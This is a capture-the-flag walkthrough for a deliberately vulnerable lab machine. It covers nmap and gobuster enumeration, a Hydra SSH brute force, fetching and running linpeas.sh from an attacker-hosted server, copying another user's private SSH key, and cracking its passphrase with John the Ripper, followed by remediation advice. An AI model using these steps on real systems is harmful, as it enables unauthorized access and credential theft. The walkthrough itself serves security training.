Target IP: basic.thm (Requires /etc/hosts entry) Difficulty: Easy Objective: Compromise the machine and retrieve the flag from the user kay.

1. Executive Summary

This assessment targets a Linux machine hosting a web application and SSH service. Initial access is achieved by enumerating valid usernames via SMB (or web context) and performing a dictionary attack (Brute Force) on the SSH service to compromise the user jan. Lateral movement to the user kay is achieved by discovering an unprotected SSH private key (id_rsa) during local enumeration. The key’s passphrase is cracked offline, granting access to kay. The final objective is reached by recovering a password from a backup file (pass.bak).

Key TTPs (MITRE ATT&CK):

  • T1110 (Brute Force): Hydra attack against SSH credentials.
  • T1082 (System Information Discovery): Using enumeration scripts (LinPEAS/LinEnum).
  • T1552 (Unsecured Credentials): Finding private keys in local directories.
  • T1110 (Brute Force): Cracking the SSH key passphrase offline.

2. Operational Setup

OpSec Note: Always organize your workspace.

Host Configuration

# Add to hosts file
echo "10.10.x.x basic.thm" | sudo tee -a /etc/hosts

Workspace (Tmux)

  • Pane 1 (Recon): nmap, gobuster.
  • Pane 2 (Brute Force): hydra, john.
  • Pane 3 (Access): SSH sessions.

3. Enumeration & Initial Access

A. Network Scanning

We start with Nmap to define the attack surface.

nmap -sC -sV -oA nmap/basic basic.thm

Results:

  • 22/tcp (SSH): OpenSSH 7.2p2 (Ubuntu).
  • 80/tcp (HTTP): Apache 2.4.18.
  • 139/445 (SMB): Samba (Optional but good for checking user lists).

B. Web Enumeration

A quick check of the web server for hidden directories.

gobuster dir -u http://basic.thm -w /usr/share/wordlists/dirb/common.txt

Findings:

  • /development -> This often contains notes mentioning names like “J” (Jan) or “K” (Kay).

C. Brute Forcing SSH (The Entry)

Based on your notes, you found the user jan and the password armando. Since there was no direct RCE on the web app, this was likely a Brute Force attack.

Command:

hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://basic.thm

Result:

  • User: jan
  • Password: armando

Login:

ssh jan@basic.thm
# Password: armando

4. Local Enumeration (The “Script” Part)

Once inside as jan, we need to see what else is on the box. You mentioned wgeting a script. This is typically LinPEAS or LinEnum.

A. Transferring Tools

Since the target has internet access (or you hosted it locally):

On Attacker Machine:

python3 -m http.server 80

On Target (jan session):

cd /tmp
wget http://10.10.YOUR.IP/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

B. Analyzing Output

The script spits out a lot of data. We filter for “Interesting Files” or “Users”.

  • User Found: kay (Root is present, but Kay is our target).
  • Critical Finding: Inside /home/kay/.ssh, there is an id_rsa file.
  • Vulnerability: The file permissions are readable by others (or jan is in a group that can read it).

Action: Copy the key content.

cat /home/kay/.ssh/id_rsa

(Copy this block to your local machine as kay_id_rsa).


5. Lateral Movement: Cracking the Key

A. The “MD5 Sum??” Confusion

You mentioned “md5 sum” and “johnny dai”. Here is what technically happened: The id_rsa key you found was encrypted with a passphrase. You cannot use it to SSH until you unlock it. SSH keys are not MD5, but we use a tool to convert the key into a hash format that John the Ripper can understand.

B. Converting the Key (ssh2john)

/usr/share/john/ssh2john.py kay_id_rsa > key.hash

C. Cracking the Passphrase (john)

Now we use John against the hash file.

john --wordlist=/usr/share/wordlists/rockyou.txt key.hash

Result:

beeswax

D. Logging in as Kay

Now we have the key and the passphrase.

# Set correct permission first (crucial for SSH keys)
chmod 600 kay_id_rsa
 
# Login
ssh -i kay_id_rsa kay@basic.thm
# Enter passphrase: beeswax

6. Final Loot (pass.bak)

We are now logged in as kay. We list the files in the home directory.

ls -la

File Found: pass.bak

Read the File:

cat pass.bak

Result: This file contains the final password/flag for the room.


7. Remediation (Blue Team)

  1. Weak Passwords:
  • The user jan had a weak password (armando) vulnerable to dictionary attacks. Enforce strong password policies.
  1. File Permissions:
  • The user kay’s private key (id_rsa) was readable by other users. SSH keys should always be 600 (Read/Write by owner only).
  • chmod 600 /home/kay/.ssh/id_rsa.
  1. SSH Key Passphrases:
  • The passphrase beeswax is extremely weak. If using keys, ensure passphrases are complex.